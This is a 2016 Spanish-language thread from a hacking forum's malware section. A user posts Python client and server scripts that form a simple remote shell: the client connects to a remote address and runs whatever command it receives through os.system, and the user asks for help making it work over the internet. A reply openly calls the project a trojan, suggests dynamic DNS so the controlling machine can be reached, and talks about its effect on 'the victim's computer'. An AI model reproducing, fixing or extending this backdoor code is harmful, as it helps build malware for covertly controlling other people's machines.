Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: dopr en 9 Agosto 2016, 15:53 pm


Título: [Ayuda] Script con python
Publicado por: dopr en 9 Agosto 2016, 15:53 pm
Buenas, hace poco he preguntado cómo comunicarme entre scripts con python para hacer una shell remota simple. Pues bien, he utilizado sockets y me ha funcionado, en red local. Ahora estoy intentando un amigo está intentando conectarse a mi script servidor desde su cliente pero no puede.

He abierto el puerto 4333 público y lo he asociado al 10001 privado en mi router.

Aquí adjunto los scripts. He sustituido las IPs por XX, si pudierais responder del mismo modo os lo agradeceria  :)

Código:
#!/usr/bin/python
# -*- coding: utf-8 -*-

#Script del cliente
 

import socket
import sys
import os
 
# Creo un socket TCP/IP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

server_address = ('XX.XXX.XX.XX', 4333)
sock.connect(server_address)


datos = sock.recv(30)

comando = str(datos)
os.system(comando)

Código:
#!/usr/bin/python
# -*- coding: utf-8 -*-
 
# Script del servidor


import socket
import sys
 
# Creo el socket TCP/IP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

direc = socket.gethostbyname(socket.gethostname())
# Enlace del socket
server_address = (direc, 10001)
connection = sock.bind(server_address)

# Escuchando conexiones entrantes
sock.listen(1)
 
coman = ''
while coman != 'salir':
    # Esperando una conexion
    print "Esperando conexion..."
    connection, client_address = sock.accept()
    coman = raw_input("Introduce comando: ")
    connection.sendall(coman)
             

connection.close()

Título: Re: [Ayuda] Script con python
Publicado por: Poyoncio en 10 Agosto 2016, 02:46 am
Para empezar a crear un troyano tendrias que informarte un poco acerca de como funcionan, no solo se basa en programar. Los troyanos generalmente son cliente & servidor es decir qe el cliente se conecta al servidor donde recibe ordenes, tu script parece se conecta a tu ordenador pero antes de llegar a tu ordenador tiene que pasar por NATs y movidas de esas que cierran el paso (si no me equivoco, es complicado conseguir una conexion directa a tu ordenador pasando por el router) es decir que para que ese script te funcione de forma correcta tendrias que subir el script que manda las ordenes al cliente a algun hosting de aplicaciones web. Si no me equivoco y esto ya no lo se con certeza porque nunca me ha interesado mucho, existen webs como no-ip que si no me equivoco te crean un nombre de dominio para que tu ordenador pueda funcionar como un servidor, repito, informate acerca de esto ultimo porque no se si es del todo correcto.

Para acabar tambien te comento que un troyano en Python no esta mal como prueba de concepto (yo cree uno hace dos meses o asi) aunque su syntaxis y librerias agilizan mucho la parte de programacion no comprnsa con el peso del programa, pues un simple hola mundo con py2exe ya pesa 5 megas y en el ordenador de la victima se nota enseguida la lentitud que genera a las demas aplicaciones


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines